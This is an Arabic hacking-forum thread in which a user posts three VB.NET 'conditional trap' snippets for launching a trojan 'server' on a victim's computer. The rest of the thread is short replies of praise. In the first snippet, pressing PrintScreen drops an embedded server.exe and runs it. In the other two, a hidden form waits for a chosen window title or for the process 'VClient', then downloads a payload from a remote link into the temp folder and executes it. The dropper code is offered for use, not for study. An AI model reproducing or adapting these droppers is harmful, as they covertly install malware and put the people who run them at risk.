1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : KaDiM aL-iRaQi | المشاهدات : 2,518 | الردود : 41
حالة الموضوع:
مغلق
  1. KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    50
    [​IMG]
    [​IMG]


    بسَم الله الرحمِن الرحيَم ، السَلام عليكِم ورحمَة الله وبركِاتة

    انِ الحمَد لله نحمَده و نستعِينه ونستغِفره و نعِوذ بالله مَن شروَر انفسِنا

    و سيَئات اعمِالنا مَن يهَده الله فلاِ مضَل لهِ و مَن يضِلل فلاِ هادِي لهَ ،





    شلونكم آعضاء وزوار منتدى عراق تيم أنشاء الله بخير


    آليوم اطرح لكم شرح 3 تلغيمات شرطيه جديده



    آنشاء الله تعجبكم

    [​IMG]


    آلتلغيمه الاولى

    عند التقاط صوره لسطح المكتب يتم تشغيل السيرفر :


    لمشاهده الشرح على اليوتوب ..
    [​IMG]
    ألكــود ::


    [C#]Public Class Form1
    Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal key As Integer) As Integer
    Dim kadim As Boolean
    Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
    Timer1.Start()
    End Sub
    Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs) Handles Timer1.Tick
    On Error Resume Next
    kadim = GetAsyncKeyState(Keys.PrintScreen) '<
    If kadim = True Then
    Text = "kadim"
    End If
    If Text = "kadim" Then
    Timer1.Stop()


    Dim KADIM As String = KADIM + "server.exe"
    IO.File.WriteAllBytes(KADIM, My.Resources.server)
    Process.Start(KADIM)


    End If
    End Sub
    End Class
    [/C#]
    [​IMG]



    التلـغيمه ألثـأنيــه


    : عند الدخول لقسم في منتدى مثل " ديف بيونت " او " عراق تيم "


    مثل قسم " حمأيه الاجهزه " يتم ختيار اي قسم .. يتم تشغيل السيرفر


    لمشأهده الشرح على اليوتوب


    [​IMG]
    الكـود

    كود:
    Public Class Form1
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Timer1.Start()
        End Sub
        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            Dim KADIM As New Process
            For Each KADIM In Process.GetProcesses
                If KADIM.MainWindowTitle.Contains("ختيار القسم") Then
                 Dim web As New System.Net.WebClient
            web.DownloadFile("رابط السيرفر المباشر", Environ("tmp") & "/اسم السيرفر مع الصيغه")
            Shell(Environ("tmp") & "/اسم السيرفر مع الصيغه")
                End If
            Next
        End Sub
    End Class
    
    *=== تحديد كود ===*
    [​IMG]

    التلغيمه الثالثه


    عند فتح برنامج معين مثل " لايت سي " أو " سكايب " يتم ختياره انت يتم تشغيل السيرفر


    لمشاهده الشرح على اليوتوب



    [​IMG]

    الكـود




    [C#]
    Public Class Form1
    Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
    Me.Hide()
    Me.ShowIcon = False
    Me.ShowInTaskbar = False
    Opacity = 0
    Timer1.Start()
    End Sub
    Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs) Handles Timer1.Tick
    Dim kadim() As Process = System.Diagnostics.Process.GetProcessesByName("VClient")
    For Each VO As Process In kadim
    Timer1.Stop()
    Text = "KADIM - ALIRAQI "
    Next
    If Text = "KADIM - ALIRAQI " Then
    Dim web As New System.Net.WebClient
    web.DownloadFile("رابط السيرفر المباشر", Environ("tmp") & "/server.exe")
    Shell(Environ("tmp") & "/server.exe")
    End If
    End Sub
    End Class​
    [/C#]​

    [​IMG]
    لتحميل جميـع ألاكوآد


    آضغـط هنــأ iQ - TEAM



    الاهداء الى الجميـع



    فـــي أمـأن الــلــه

    {1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}


    [​IMG]
     
    1 person likes this.
  2. مصطفى القاضي Developer

    الأنتساب:
    ‏5 يناير 2015
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    (( حـزب اللـه ))
    الإقامة:
    بغ ـــداد
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: شرح ثلاثه تلغيمات شرطية

    عاشت ايدك حبيبي كاظم
     
  3. DarKMaSTer Developer

    الأنتساب:
    ‏16 يونيو 2012
    المشاركات:
    32
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    HACKER
    الإقامة:
    SauDi HACKER
    نظام التشغيل:
    Linux
    رد: شرح ثلاثه تلغيمات شرطية

    الله يعطيك العافية تسلم حبيبي
     
  4. HacKeR 8 Developer

    الأنتساب:
    ‏25 فبراير 2013
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    U.A.E
    رد: شرح ثلاثه تلغيمات شرطية

    #عاشت الأيادي على هذا المجهود الرائع
     
  5. Tr0J4n ExpErt DeveloPer

    الأنتساب:
    ‏3 سبتمبر 2011
    المشاركات:
    50
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    الصين الشعبيه
    رد: شرح ثلاثه تلغيمات شرطية

    بارك الله فيك يا غالي
     
  6. Dr.Sh$ll Developer

    الأنتساب:
    ‏11 مايو 2014
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الإقامة:
    in ksa
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python
    رد: شرح ثلاثه تلغيمات شرطية

    الله يعطيك الف عافية يا غالي على هذا المجهود
     
  7. Dr.Sh$ll Developer

    الأنتساب:
    ‏11 مايو 2014
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الإقامة:
    in ksa
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python
    رد: شرح ثلاثه تلغيمات شرطية

    ماذا تعتقد في مشاركة KaDiM aL-iRaQi؟يعجبني ويستحق التقييم
     
  8. AZD ALIRAQI Developer

    الأنتساب:
    ‏31 ديسمبر 2014
    المشاركات:
    86
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    البصرة
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    Visual Basic
    رد: شرح ثلاثه تلغيمات شرطية

    عاشت ايدك
    دومك مبدع ​
     
  9. ألملازم محمد ألعراقي V • I • P

    الأنتساب:
    ‏24 أغسطس 2014
    المشاركات:
    514
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: شرح ثلاثه تلغيمات شرطية

    السلام عليكم

    بارك الله بيك حبي

    واصل يا بطل

     
  10. PayPal Developer

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    رد: شرح ثلاثه تلغيمات شرطية

    تسلم أيدك يا بطل ^[​IMG]^
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة